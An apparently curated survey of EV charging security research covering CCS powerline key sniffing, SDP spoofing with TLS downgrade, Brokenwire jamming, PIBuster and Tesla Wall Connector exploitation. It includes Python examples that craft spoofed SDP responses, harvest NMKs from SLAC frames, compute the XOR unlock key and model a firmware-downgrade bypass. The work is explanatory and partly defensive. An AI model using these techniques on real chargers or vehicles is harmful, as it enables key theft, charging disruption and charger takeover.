EV Charging
Electric vehicles add two attack surfaces that conventional cars do not have. DC fast-charging via the Combined Charging System (CCS) runs an IP stack over the Control Pilot wire using HomePlug Green PHY (HPGP) powerline communication, and the way the physical layer is built lets that signal leak wirelessly. Smart AC chargers such as the Tesla Wall Connector carry their own firmware, network stacks, and bidirectional protocol communication with the vehicle. The Oxford group (Martinovic, Baker, Köhler, Szakály) has worked through the CCS PHY side from 2019 to 2025, and Synacktiv researcher David Berard published a two-part Wall Connector analysis in 2025 and 2026.
CCS PLC Layer and PHY
HomePlugAV PLC: Practical Attacks and Backdooring
Dudek (Synacktiv), NoSuchCon 2014 [1]
This one sets up the EV-charging research below. HomePlugAV is the OFDM-over-mains powerline standard, and its HomePlug Green PHY variant is reused inside CCS charging. Dudek found three problems. The Network Membership Key (NMK) that encrypts traffic is exposed in cleartext over the local Ethernet interface during pairing. The Device Access Key (DAK) passphrase used to set the NMK is a deterministic function of the device MAC on Qualcomm Atheros parts, so anyone who learns the MAC can push a new NMK into the modem. And the same management channel allows arbitrary memory read and write on the PLC modem. The Qualcomm QCA7000 modem family later turns up in most CCS stations surveyed by Szakály et al.
V2G Injector: Whispering to Cars and Charging Units Through the Power-Line
Dudek, Delaunay, Fargues (Synacktiv), SSTIC 2019 [2]
V2G Injector was the first open-source tool for packet capture and injection on the HomePlug Green PHY layer used by CCS electric vehicle charging. Until it existed, no publicly available equipment could interface with V2G powerline traffic at all. Commercial analysis tools cost thousands of euros and captured only a limited packet count. The tool is open source at github.com/FlUxIuS/V2GInjector.
The hardware is a Devolo HomePlug GP development kit based on the Qualcomm QCA7000 modem, bought for roughly 200 euros. They exposed the QCA7000's SPI/Ethernet interface so custom firmware and Scapy layers could drive it directly. On the software side they wrote the missing Scapy protocol layers for HPGP, the SECC Discovery Protocol, and V2GTP. They also built a fuzzy EXI decoder that tries multiple XML Schema grammars to recover V2G message content without any context state.
The NMK-sniffing technique carries over from Dudek's 2014 HomePlugAV work [1]. A device put into PEV mode can passively receive the CM_SLAC_MATCH.CNF from any nearby EVSE and read the NMK in cleartext, since SLAC management messages are broadcast unencrypted over the powerline.
Once inside the AV Logical Network (AVLN), an attacker can inject traffic either by ICMPv6 neighbour spoofing or by racing the SECC Discovery Protocol (SDP) exchange: a crafted SDP response that arrives before the charger's own redirects the vehicle's TCP session to an attacker-controlled IPv6 endpoint.
They also find that the security field of the SDP response can be abused to downgrade the session from TLS to cleartext. The Oxford group's academic work builds on this tool. Baker 2019 cites the SLAC NMK-capture approach and builds a purpose-built SDR receiver around the same underlying flaw.
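As an added illustration (this is not code from V2G Injector or from the SSTIC paper), the following Python builds and parses the SDP exchange described above and shows the EV-side decision that makes the downgrade possible. The V2GTP header layout and the SDP security/transport byte values follow ISO 15118-2; the IPv6 addresses, ports and the two-policy `ev_accepts` function are constructed for the example.

```python
import ipaddress
import struct

# V2GTP header (ISO 15118-2): version 0x01, inverse version 0xFE, 16-bit payload type,
# 32-bit payload length, all big-endian. SDP runs over UDP port 15118 (sockets not modelled).
V2GTP_VERSION, V2GTP_INV_VERSION = 0x01, 0xFE
SDP_REQUEST, SDP_RESPONSE = 0x9000, 0x9001

# SDP security byte: 0x00 = TLS, 0x10 = no transport layer security.
# SDP transport byte: 0x00 = TCP, 0x10 = UDP.
SEC_TLS, SEC_NONE = 0x00, 0x10
TRANSPORT_TCP = 0x00


def v2gtp_pack(payload_type, payload):
    return struct.pack(">BBHI", V2GTP_VERSION, V2GTP_INV_VERSION, payload_type, len(payload)) + payload


def v2gtp_unpack(datagram):
    """Check the V2GTP header and return (payload_type, payload); reject anything malformed."""
    if len(datagram) < 8:
        raise ValueError("short V2GTP datagram")
    version, inv_version, payload_type, length = struct.unpack(">BBHI", datagram[:8])
    if version != V2GTP_VERSION or inv_version != V2GTP_INV_VERSION:
        raise ValueError("bad V2GTP version bytes")
    if length != len(datagram) - 8:
        raise ValueError("V2GTP length does not match datagram")
    return payload_type, datagram[8:]


def build_sdp_request(security=SEC_TLS, transport=TRANSPORT_TCP):
    """EV side: the 2-byte SDP request asking for a TLS-capable SECC."""
    return v2gtp_pack(SDP_REQUEST, bytes([security, transport]))


def build_sdp_response(ipv6, port, security, transport=TRANSPORT_TCP):
    """SECC side (or attacker side): 20-byte SDP response with address, port and security choice."""
    addr = ipaddress.IPv6Address(ipv6).packed
    return v2gtp_pack(SDP_RESPONSE, addr + struct.pack(">HBB", port, security, transport))


def parse_sdp_response(datagram):
    payload_type, payload = v2gtp_unpack(datagram)
    if payload_type != SDP_RESPONSE or len(payload) != 20:
        raise ValueError("not an SDP response")
    port, security, transport = struct.unpack(">HBB", payload[16:])
    return {"ipv6": str(ipaddress.IPv6Address(payload[:16])), "port": port,
            "security": security, "transport": transport}


def ev_accepts(requested_security, response, strict):
    """EV decision on an SDP response. strict=False models a vehicle that simply follows the
    security byte it is given (the downgrade path); strict=True refuses any response that
    offers less protection than the vehicle asked for."""
    resp = parse_sdp_response(response)
    if strict and requested_security == SEC_TLS and resp["security"] != SEC_TLS:
        return False
    return True


def race_demo():
    """Constructed exchange: the EV asks for TLS, a genuine SECC answers with TLS, and an
    attacker on the AVLN answers first with its own link-local address and no TLS."""
    request = build_sdp_request(SEC_TLS)
    genuine = build_sdp_response("fe80::2", 61341, SEC_TLS)      # constructed SECC answer
    crafted = build_sdp_response("fe80::bad", 15118, SEC_NONE)   # constructed attacker answer
    return {
        "request_len": len(request),
        "permissive_ev_follows_attacker": ev_accepts(SEC_TLS, crafted, strict=False),
        "strict_ev_follows_attacker": ev_accepts(SEC_TLS, crafted, strict=True),
        "strict_ev_follows_genuine": ev_accepts(SEC_TLS, genuine, strict=True),
        "attacker_endpoint": parse_sdp_response(crafted),
    }


if __name__ == "__main__":
    for key, value in race_demo().items():
        print(key, value)
```

The race itself is just "whoever answers the UDP request first wins"; the interesting part is the last two bytes of the response. A vehicle that does not compare the security byte it receives against the one it requested will happily open a cleartext TCP session to whichever address arrived first.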
Devolo dLAN Green PHY eval board (EU II), the HomePlug Green PHY development kit based on the Qualcomm QCA7000 modem used by V2G Injector. Product photo: Codico.
Losing the Car Keys: Wireless PHY-Layer Insecurity in EV Charging
Baker, Martinovic, USENIX Security 2019 [3]
Baker and Martinovic gave the first complete picture of the wireless side channel in CCS. HomePlug Green PHY delivers an IP stack over the Control Pilot and Protective Earth lines, and the unshielded cable radiates the HF-band OFDM signal. A CAN square wave is distorted as it couples from cable to air, but an OFDM waveform arrives almost intact, which makes passive interception practical with standard SDR hardware.
The CCS session opens with the SLAC handshake, in which the vehicle sends sounding messages and the charger reports attenuation to prove physical connection. At the end of SLAC, the charger transmits the Network Membership Key (NMK) to the vehicle in the CM_SLAC_MATCH.CNF message, in plaintext, with no confidentiality option. An attacker who captures this exchange can join the HPGP network and decrypt all subsequent MAC-layer traffic.
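The following Python is an added example covering the sniffing step described in both the V2G Injector and Baker write-ups; it is not code from either project. It assembles and parses the CM_SLAC_MATCH.CNF management message that carries the NMK, using the HomePlug AV EtherType (0x88E1), the MMV/MMTYPE/FMI management header and the fixed-width MatchVarField of ISO 15118-3 Annex A. The frames, MACs and identifiers are constructed sample data; the NMK value is the widely published key for the passphrase "HomePlugAV", used here only as sample bytes.

```python
import struct

ETHERTYPE_HOMEPLUG_AV = 0x88E1
MMV_HPAV11 = 0x01                  # MME version used by HomePlug Green PHY / ISO 15118-3
MMTYPE_CM_SLAC_MATCH_CNF = 0x607D  # CM_SLAC_MATCH (0x607C) with the CNF bit set
MVF_LEN_CNF = 0x56                 # MatchVarField length in the CNF (86 bytes)

# Fixed-width MatchVarField of CM_SLAC_MATCH.CNF (ISO 15118-3 Annex A):
# PEV ID(17) PEV MAC(6) EVSE ID(17) EVSE MAC(6) RunID(8) RSVD(8) NID(7) RSVD(1) NMK(16)
MVF_CNF = struct.Struct("<17s6s17s6s8s8s7s1s16s")


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def build_slac_match_cnf(dst, src, pev_id, pev_mac, evse_id, evse_mac, run_id, nid, nmk):
    """EVSE side: the Ethernet frame that ends SLAC and hands the NMK to the vehicle in clear."""
    mvf = MVF_CNF.pack(pev_id.ljust(17, b"\0"), pev_mac, evse_id.ljust(17, b"\0"), evse_mac,
                       run_id, bytes(8), nid, bytes(1), nmk)
    eth = struct.pack(">6s6sH", dst, src, ETHERTYPE_HOMEPLUG_AV)
    mme = struct.pack("<BHH", MMV_HPAV11, MMTYPE_CM_SLAC_MATCH_CNF, 0)  # MMV, MMTYPE (LE), FMI
    entry = struct.pack("<BBH", 0x00, 0x00, MVF_LEN_CNF)                 # APPLICATION_TYPE, SECURITY_TYPE, MVFLength
    return eth + mme + entry + mvf


def parse_slac_match_cnf(frame):
    """Sniffer side: return the fields of a CM_SLAC_MATCH.CNF, or None for any other frame."""
    if len(frame) < 23:
        return None
    dst, src, ethertype = struct.unpack(">6s6sH", frame[:14])
    if ethertype != ETHERTYPE_HOMEPLUG_AV:
        return None
    mmv, mmtype, fmi = struct.unpack("<BHH", frame[14:19])
    if mmtype != MMTYPE_CM_SLAC_MATCH_CNF:
        return None
    app_type, sec_type, mvf_len = struct.unpack("<BBH", frame[19:23])
    if mvf_len != MVF_LEN_CNF or len(frame) < 23 + MVF_LEN_CNF:
        raise ValueError("malformed CM_SLAC_MATCH.CNF")
    pev_id, pev_mac, evse_id, evse_mac, run_id, _, nid, _, nmk = MVF_CNF.unpack(frame[23:23 + MVF_LEN_CNF])
    return {
        "evse_mac": mac_str(evse_mac), "pev_mac": mac_str(pev_mac),
        "evse_id": evse_id.rstrip(b"\0").decode(errors="replace"),
        "pev_id": pev_id.rstrip(b"\0").decode(errors="replace"),
        "run_id": run_id.hex(), "nid": nid.hex(), "nmk": nmk.hex(),
    }


def harvest_nmks(frames):
    """Walk a capture (list of raw Ethernet frames) and keep the latest NMK seen per EVSE MAC.
    This is all a passive device in PEV mode needs to do to collect keys for every charger in range."""
    keys = {}
    for frame in frames:
        match = parse_slac_match_cnf(frame)
        if match:
            keys[match["evse_mac"]] = match["nmk"]
    return keys


def sample_capture():
    """Constructed frames, not a real capture: one unrelated SLAC MME and one MATCH.CNF."""
    evse_mac = bytes.fromhex("001122334455")
    pev_mac = bytes.fromhex("66778899aabb")
    other_mme = (struct.pack(">6s6sH", pev_mac, evse_mac, ETHERTYPE_HOMEPLUG_AV)
                 + struct.pack("<BHH", MMV_HPAV11, 0x6065, 0) + bytes(10))   # CM_SLAC_PARM.CNF, body not modelled
    cnf = build_slac_match_cnf(pev_mac, evse_mac, b"PEV-ID-0001", pev_mac, b"EVSE-ID-0001", evse_mac,
                               bytes.fromhex("0102030405060708"), bytes.fromhex("01020304050607"),
                               bytes.fromhex("50d3e4933f855b7040784df815aa8db7"))
    return [other_mme, cnf]


if __name__ == "__main__":
    for frame in sample_capture():
        print(parse_slac_match_cnf(frame))
    print(harvest_nmks(sample_capture()))
```

Feeding the same parser with frames recovered by a wireless receiver (Baker's path) or by a QCA7000 in PEV mode (the V2G Injector path) yields the same result: the NMK, the NID and both long-term identifiers, with nothing to decrypt. Joining the AVLN afterwards is a single CM_SET_KEY to the attacker's own modem.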
The authors built the first wireless eavesdropping tool for HomePlug GreenPHY. It implements the full software receiver path, from frame detection through OFDM demodulation, turbo-code FEC, and CRC validation. Across 54 sessions at public chargers with three production EVs, it recovered 91.8% of packets with valid CRC32 checksums from an adjacent parking bay 4.2 m away. No session used TLS. Long-term vehicle identifiers showed up in 76% of sessions, which allows user tracking and, where AutoCharge billing is deployed, free charging on another account. As a fix, the paper proposes an optional ECDH step in the SLAC handshake for confidentiality.
Field eavesdropping setups: (Figure 7) capturing from the adjacent parking bay with the antenna more than 4 metres from the charging cable, and (Figure 8) sitting between two simultaneously charging vehicles to capture NMK key establishment for both. Figure from Baker, Martinovic, 2019 (Losing the Car Keys).
Brokenwire: Wireless Disruption of CCS Electric Vehicle Charging
Köhler, Baker, Strohmeier, Martinovic, NDSS 2023 [4]
The same PHY behaviour that makes passive eavesdropping easy also opens up an active disruption attack.
HPGP requires Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA), so any node that hears an ongoing transmission backs off. Brokenwire abuses that rule by transmitting a continuous stream of HPGP preamble symbols, the part of every frame that receivers use for carrier sensing. Both ends of the charging session read the channel as permanently busy and cannot transmit. After roughly two seconds the ISO 15118 message timeout expires and the session aborts, and the standard then requires manual intervention (unplug and replug) before a new session can begin.
The attack needs a 1 W amplifier, a commodity LimeSDR tuned to 17 MHz, and a 7 m dipole antenna, for under $1,000. It beats broadband noise jamming by three orders of magnitude, because it works against the protocol's own CSMA/CA logic instead of trying to overpower HPGP's noise resistance. Real-world testing covered eight vehicles and twenty chargers across several European public deployments and succeeded in every combination tried, with a maximum effective range of 47 m. The abused behaviour is required by HomePlug Green PHY, DIN 70121, and ISO 15118, so every conforming implementation is vulnerable, including fleet vehicles, electric buses, and ferries that rely on overnight CCS charging.
Five attack scenarios tested in the real-world evaluation, from single-vehicle drive-by disruption (Scenario 1) to multi-vehicle fleet denial from across the street (Scenario 5), with the attacker remaining inside their own vehicle. Figure from Köhler et al., 2023 (Brokenwire).
Aerial distance measurement for Scenario 5, showing the 47.39 m range between the attacker vehicle and the target charging bay across a street intersection. Figure from Köhler et al., 2023 (Brokenwire).
Current Affairs: A Security Measurement Study of CCS EV Charging Deployments
Szakály, Köhler, Martinovic, USENIX Security 2025 [5]
CCS security problems had been public since 2019, so Szakály and colleagues set out to measure how many deployed chargers had actually fixed them.
They built an EV emulator that walks through the full CCS sequence (CP/PE signalling, SLAC, SDP, TLS negotiation, V2G protocol negotiation), with relay-controlled automatic reconnection so collection could run unattended at scale. The dataset covers 325 chargers from 26 manufacturers across four European countries, manufactured between 2013 and mid-2023. 88% implement no TLS whatsoever. ISO 15118-2 support (optional TLS) reached only 47% overall, and no charger had deployed ISO 15118-20, which makes TLS mandatory.
Separately, 78% of chargers used the Qualcomm QCA7000 modem, and most ran firmware from 2013 to 2015, none dated after the 2022 Brokenwire disclosure. In some manufacturer implementations the NMK could be derived directly from the publicly broadcast Network Identifier.
Short: PIBuster - Exploiting a Common Misconfiguration in CCS EV Chargers
Szakály, Köhler, Martinovic, USENIX VehicleSec 2025 [6]
This short paper takes a finding from "Current Affairs" and turns it into an attack. The Qualcomm HPGP modem in CCS chargers keeps all of its configuration in a binary Parameter Information Block (PIB), and many chargers leave that PIB remotely readable and writable over the PLC interface.
Binary analysis and controlled experiments pinned it down to a single byte at offset 0x1F8C that controls remote PIB access. When that byte is zero, which appears to be the factory default, any device that has completed SLAC can overwrite the modem's entire configuration. Of 69 CCS connectors tested at California public stations, 41 had the vulnerable setting. The writable fields include the NMK, the SLAC mode byte, and the SPI interface enable bit. Disabling SPI cuts the only link between the PLC modem and the charger's host processor, a persistent denial of service that can only be recovered by replacing the hardware. Qualcomm acknowledged the issue, issued a CVE, and committed to flipping the default in future firmware.
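An added example of the offline check a practitioner would run on a PIB dump before (or after) a site visit; it is not the PIBuster tooling. Only the 0x1F8C offset comes from the paper as summarised above. The MAC, NMK and manufacturer-HFID offsets are assumptions taken from the open-plc-utils pib.h layout for QCA7000-class modems, the PIB image is constructed, and the "any non-zero value disables remote access" interpretation of `harden_pib` is likewise an assumption, since the page does not give the value a vendor would actually ship.

```python
# Only 0x1F8C comes from the PIBuster write-up. The other offsets are assumptions from the
# open-plc-utils pib.h layout for QCA7000-class modems; verify against your firmware's pib.h.
REMOTE_PIB_ACCESS_OFFSET = 0x1F8C
PIB_MAC_OFFSET = 0x000C
PIB_NMK_OFFSET = 0x0028
PIB_MFG_HFID_OFFSET = 0x0074
HFID_LEN = 64
MIN_PIB_LEN = 0x2000                      # assumed: any PIB that contains offset 0x1F8C
NMK_HOMEPLUGAV_DEFAULT = bytes.fromhex("50d3e4933f855b7040784df815aa8db7")  # NMK for passphrase "HomePlugAV"


def make_sample_pib(remote_access_byte=0x00, nmk=NMK_HOMEPLUGAV_DEFAULT,
                    mac=bytes.fromhex("001122334455"), hfid=b"Sample EVSE modem"):
    """Constructed PIB image for testing; not a dump from any real charger."""
    pib = bytearray(MIN_PIB_LEN)
    pib[PIB_MAC_OFFSET:PIB_MAC_OFFSET + 6] = mac
    pib[PIB_NMK_OFFSET:PIB_NMK_OFFSET + 16] = nmk
    pib[PIB_MFG_HFID_OFFSET:PIB_MFG_HFID_OFFSET + HFID_LEN] = hfid.ljust(HFID_LEN, b"\0")
    pib[REMOTE_PIB_ACCESS_OFFSET] = remote_access_byte
    return bytes(pib)


def audit_pib(pib):
    """Return the identifying fields plus a list of findings for one PIB image."""
    if len(pib) < MIN_PIB_LEN:
        raise ValueError("PIB too short to contain the remote-access byte")
    findings = []
    if pib[REMOTE_PIB_ACCESS_OFFSET] == 0x00:
        findings.append("remote PIB read/write enabled: byte at 0x1F8C is 0x00 (the factory default reported by PIBuster)")
    nmk = pib[PIB_NMK_OFFSET:PIB_NMK_OFFSET + 16]
    if nmk == NMK_HOMEPLUGAV_DEFAULT:
        findings.append("NMK is the well-known HomePlugAV default")
    elif nmk == bytes(16):
        findings.append("NMK is all zeros")
    return {
        "mac": ":".join(f"{b:02x}" for b in pib[PIB_MAC_OFFSET:PIB_MAC_OFFSET + 6]),
        "mfg_hfid": pib[PIB_MFG_HFID_OFFSET:PIB_MFG_HFID_OFFSET + HFID_LEN].rstrip(b"\0").decode(errors="replace"),
        "nmk": nmk.hex(),
        "findings": findings,
    }


def harden_pib(pib):
    """Copy of the PIB with remote access disabled. Assumption: any non-zero value at 0x1F8C
    turns the feature off, as the paper summary describes; the value a vendor actually ships is
    not given there. A real PIB also carries an image checksum that must be recomputed before
    the modified image is written back (not modelled here)."""
    out = bytearray(pib)
    out[REMOTE_PIB_ACCESS_OFFSET] = 0x01
    return bytes(out)


if __name__ == "__main__":
    report = audit_pib(make_sample_pib())
    print(report["mac"], report["mfg_hfid"], report["nmk"])
    for finding in report["findings"]:
        print(" -", finding)
    print("after hardening:", audit_pib(harden_pib(make_sample_pib()))["findings"])
```

The audit is deliberately read-only: on a live charger the same byte that lets you read the PIB lets anyone who has finished SLAC write it, and the SPI-enable bit described above is the one field you do not want to get wrong while experimenting.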
PIB binary layout showing the first 0x80 bytes with colour-coded fields: MAC address, HFID manufacturer string, NMK, and security control byte at 0x1F8C. Figure from Szakály et al., 2025 (PIBuster).
Level 1 and 2 Chargers
Exploiting the Tesla Wall Connector from its Charge Port Connector
Berard (Synacktiv), Pwn2Own Automotive 2025 [7]
Berard's Pwn2Own Automotive 2025 entry uses the charging cable as its entry point. The Tesla Wall Connector Gen 3 runs a Marvell 88MW300 (ARM Cortex-M4) on an AW-CU300 connectivity card, plus an STM32 co-processor for relay control, and it does not use HPGP. After the standard CP/PE signalling, the charger switches to a proprietary Single-Wire CAN (SWCAN) protocol at 33.3 kbps on the Control Pilot line. None of this is publicly documented; Berard worked it out with an oscilloscope.
The AW-CU300 firmware exposes a full UDS stack over SWCAN on CAN ID 0x604. The SecurityAccess key for level 5 is trivial: the 16-byte seed with every byte XORed with 0x35. A debug firmware build (0.8.58), pulled from a 2020 Tesla infotainment dump, has two features the release build lacks: a UDS ReadDataByIdentifier that returns the Wi-Fi PSK, and a TCP debug shell reachable over the charger's setup AP. At the time of the competition there was no anti-downgrade check, so nothing stopped an older image from being uploaded through the standard RequestDownload/TransferData/RequestTransferExit (0x34/0x36/0x37) sequence. Synacktiv downgraded to 0.8.58 over SWCAN (about 15 minutes at 33.3 kbps), read the PSK via UDS, joined the AP, and reached the debug shell. Code execution came from a global buffer overflow in the shell's argument parser: a 17th argument overwrites the adjacent function-pointer table, which sits in a region mapped RWX. Tesla patched it by adding anti-downgrade protection.
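The SecurityAccess exchange above, written out as an added example with both sides and the ISO-TP framing a 16-byte seed needs on CAN. This is not Synacktiv's tooling or Tesla's firmware: the ECU handler is modelled from the description, the response CAN ID (which the write-up does not give) is left out, the seed is a constructed value, and the ISO-TP flow-control frame between first and consecutive frames is omitted.

```python
UDS_REQUEST_CAN_ID = 0x604            # from the write-up; the response ID is not given there
SID_SECURITY_ACCESS = 0x27
POSITIVE_RESPONSE_OFFSET = 0x40
SUBFN_REQUEST_SEED = 0x05             # the "level 5" of the write-up
SUBFN_SEND_KEY = SUBFN_REQUEST_SEED + 1   # UDS pairs seed sub-function n with key sub-function n+1
NRC_SUB_FUNCTION_NOT_SUPPORTED = 0x12
NRC_INVALID_KEY = 0x35
KEY_XOR = 0x35
ISOTP_PAD = 0x00                      # padding byte, an arbitrary choice here


def compute_key(seed):
    """The seed-to-key transform described above: XOR every byte with 0x35."""
    return bytes(b ^ KEY_XOR for b in seed)


def build_request_seed():
    return bytes([SID_SECURITY_ACCESS, SUBFN_REQUEST_SEED])


def build_send_key(seed):
    return bytes([SID_SECURITY_ACCESS, SUBFN_SEND_KEY]) + compute_key(seed)


def ecu_security_access(request, seed, state):
    """Model of the charger's SecurityAccess handler, written from the description above
    (not Tesla's or Synacktiv's code). `seed` is what the ECU would generate; `state` persists."""
    if len(request) < 2 or request[0] != SID_SECURITY_ACCESS:
        return bytes([0x7F, request[0] if request else 0x00, 0x11])   # serviceNotSupported
    sub = request[1]
    if sub == SUBFN_REQUEST_SEED:
        state["seed"] = seed
        return bytes([SID_SECURITY_ACCESS + POSITIVE_RESPONSE_OFFSET, sub]) + seed
    if sub == SUBFN_SEND_KEY:
        expected = state.get("seed")
        if expected is not None and request[2:] == compute_key(expected):
            state["unlocked"] = True
            return bytes([SID_SECURITY_ACCESS + POSITIVE_RESPONSE_OFFSET, sub])
        return bytes([0x7F, SID_SECURITY_ACCESS, NRC_INVALID_KEY])
    return bytes([0x7F, SID_SECURITY_ACCESS, NRC_SUB_FUNCTION_NOT_SUPPORTED])


def isotp_segment(payload):
    """Split a UDS payload into 8-byte CAN data fields per ISO 15765-2: single frame for up to
    7 bytes, otherwise a first frame (6 bytes) plus consecutive frames (7 bytes each).
    The receiver's flow-control frame (0x30 ...) between FF and CF is omitted."""
    if len(payload) <= 7:
        return [bytes([len(payload)]) + payload.ljust(7, bytes([ISOTP_PAD]))]
    frames = [bytes([0x10 | (len(payload) >> 8), len(payload) & 0xFF]) + payload[:6]]
    seq, pos = 1, 6
    while pos < len(payload):
        chunk = payload[pos:pos + 7]
        frames.append(bytes([0x20 | (seq & 0x0F)]) + chunk.ljust(7, bytes([ISOTP_PAD])))
        seq, pos = seq + 1, pos + 7
    return frames


def isotp_reassemble(frames):
    """Inverse of isotp_segment: rebuild the payload and check the CF sequence numbers."""
    first = frames[0]
    pci = first[0] >> 4
    if pci == 0:
        return bytes(first[1:1 + (first[0] & 0x0F)])
    if pci != 1:
        raise ValueError("expected a single or first frame")
    length = ((first[0] & 0x0F) << 8) | first[1]
    data = bytearray(first[2:8])
    for i, cf in enumerate(frames[1:], start=1):
        if cf[0] != (0x20 | (i & 0x0F)):
            raise ValueError("bad consecutive-frame sequence number")
        data += cf[1:8]
    return bytes(data[:length])


def unlock_sequence(seed):
    """Tester side: both halves of the exchange over modelled ISO-TP on CAN ID 0x604.
    Returns the ECU state and the final response payload."""
    state = {}
    seed_resp = isotp_reassemble(isotp_segment(
        ecu_security_access(isotp_reassemble(isotp_segment(build_request_seed())), seed, state)))
    if seed_resp[:2] != bytes([0x67, SUBFN_REQUEST_SEED]):
        raise RuntimeError("seed request refused")
    key_resp = isotp_reassemble(isotp_segment(
        ecu_security_access(isotp_reassemble(isotp_segment(build_send_key(seed_resp[2:]))), seed, state)))
    return state, key_resp


if __name__ == "__main__":
    demo_seed = bytes(range(16))   # constructed seed; a real one comes from the charger
    for frame in isotp_segment(build_send_key(demo_seed)):
        print(f"{UDS_REQUEST_CAN_ID:03X}#{frame.hex()}")
    print(unlock_sequence(demo_seed))
```

The point of writing the handler out is how little the seed buys: because the key is a fixed bitwise function of the seed, anyone who can see one seed/key pair on the bus, or simply read the firmware, can unlock every unit. A real implementation would derive the key from a per-device secret so that the transform is not recoverable from the transcript.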
Single-Wire CAN protocol exchange captured on the Control Pilot line during a Tesla Wall Connector session. Figure from Berard (Synacktiv), 2025 (Exploiting the Tesla Wall Connector).
Exploiting the Tesla Wall Connector from its Charge Port Connector - Part 2: Bypassing the Anti-Downgrade
Berard (Synacktiv), Pwn2Own Automotive 2025 [8]
Tesla's patch introduced a ratchet integer in each firmware image; routine 0x201 (switch_to_new_firmware) reads the current ratchet from persistent storage and rejects any image with a lower value.
The bypass hinges on an ordering bug between two routines. Routine 0x201 commits the partition layout and bumps the generation counter of the validated slot; the bootloader then picks the slot with the highest counter and checks CRC and RSA signature, but not the ratchet. Routine 0xFF00 (prepare_passive_slot) picks the physical slot to erase from a boot flag that is set once at startup and never updated mid-session. The sequence: (1) upload a current signed image and call 0x201, passing the ratchet check and setting that slot's generation counter to highest; (2) call 0xFF00 without rebooting so the same physical slot is selected as passive and erased; (3) upload old firmware 0.8.58 into the now-empty slot; (4) call 0x202 to reboot, bypassing 0x201 entirely. The bootloader finds the slot with the highest counter, verifies the legitimately signed old image, and executes it. Two firmware transfers raise the total attack time to around 30 minutes. Tesla issued a fix after disclosure.
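To make the ordering bug concrete, here is an added Python model of the slot, generation-counter and ratchet logic as the write-up describes it, run once with the vulnerable ordering and once with two mitigations. It is not Tesla's bootloader code, and the mitigations (refusing 0xFF00 while a validated switch is pending, and having the bootloader enforce the ratchet) are this example's own; the page only says that Tesla issued a fix. Version strings, ratchet values and generation counters are constructed, and "signed" stands in for the CRC and RSA checks.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Image:
    version: str
    ratchet: int          # anti-downgrade integer carried in the signed image (0 for pre-ratchet builds, assumed)
    signed: bool = True   # stands in for the bootloader's CRC + RSA signature check


@dataclass
class WallConnectorModel:
    fixed: bool
    slots: List[Optional[Image]] = field(default_factory=lambda: [Image("1.2.0", 2), Image("1.1.0", 1)])
    gen: List[int] = field(default_factory=lambda: [5, 4])   # per-slot generation counter; bootloader picks the max
    stored_ratchet: int = 2
    booted: int = 0
    boot_passive: int = 1          # "which slot is passive" flag, computed once at boot and never refreshed
    prepared: Optional[int] = None
    switch_pending: bool = False

    def routine_ff00_prepare_passive_slot(self):
        if self.fixed and self.switch_pending:
            return "rejected: switch pending, reboot required"
        idx = self.boot_passive          # the bug: stale flag, even after 0x201 validated this very slot
        self.slots[idx] = None
        self.prepared = idx
        return f"erased slot {idx}"

    def upload(self, image):
        """Stands in for the 0x34/0x36/0x37 transfer into the prepared slot."""
        if self.prepared is None:
            return "rejected: no prepared slot"
        self.slots[self.prepared] = image
        return f"written to slot {self.prepared}"

    def routine_201_switch_to_new_firmware(self):
        idx = self.boot_passive
        img = self.slots[idx]
        if img is None or not img.signed:
            return "rejected: no valid image"
        if img.ratchet < self.stored_ratchet:
            return "rejected: ratchet"
        self.stored_ratchet = img.ratchet
        self.gen[idx] = max(self.gen) + 1   # this slot now wins at the next boot
        self.prepared = None
        self.switch_pending = True
        return "ok"

    def routine_202_reboot(self):
        """Bootloader: highest generation counter first, signature checked, ratchet only when fixed."""
        for idx in sorted(range(2), key=lambda i: self.gen[i], reverse=True):
            img = self.slots[idx]
            if img is None or not img.signed:
                continue
            if self.fixed and img.ratchet < self.stored_ratchet:
                continue
            self.booted, self.boot_passive = idx, 1 - idx
            self.prepared, self.switch_pending = None, False
            return img.version
        raise RuntimeError("no bootable image")


def run_downgrade_attack(fixed):
    """The four-step sequence from the write-up; returns the log with the booted version last."""
    wc = WallConnectorModel(fixed=fixed)
    current = Image("1.2.0", ratchet=2)   # legitimately signed current build
    old = Image("0.8.58", ratchet=0)      # legitimately signed debug build, predates the ratchet
    return [
        wc.routine_ff00_prepare_passive_slot(),
        wc.upload(current),
        wc.routine_201_switch_to_new_firmware(),   # passes the ratchet check, slot gets highest counter
        wc.routine_ff00_prepare_passive_slot(),    # stale boot flag: erases the slot just validated
        wc.upload(old),
        wc.routine_202_reboot(),                   # bootloader never sees 0x201 again
    ]


if __name__ == "__main__":
    print("vulnerable:", run_downgrade_attack(fixed=False))
    print("mitigated: ", run_downgrade_attack(fixed=True))
```

The model shows why adding a ratchet check to a single routine is not enough: the check runs in 0x201, but the decision about what to boot is made by the bootloader from the generation counters, and 0xFF00 lets the attacker swap the image behind an already-validated counter. Either mitigation alone would stop this particular sequence; enforcing the ratchet at boot time is the one that survives other routine orderings.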
Main board of the Tesla Wall Connector Gen 3 showing the AW-CU300 connectivity card (Marvell 88MW300, ARM Cortex-M4), the STM32 co-processor, and the absent Qualcomm PLC chipset footprint. Figure from Berard (Synacktiv), 2025 (Exploiting the Tesla Wall Connector).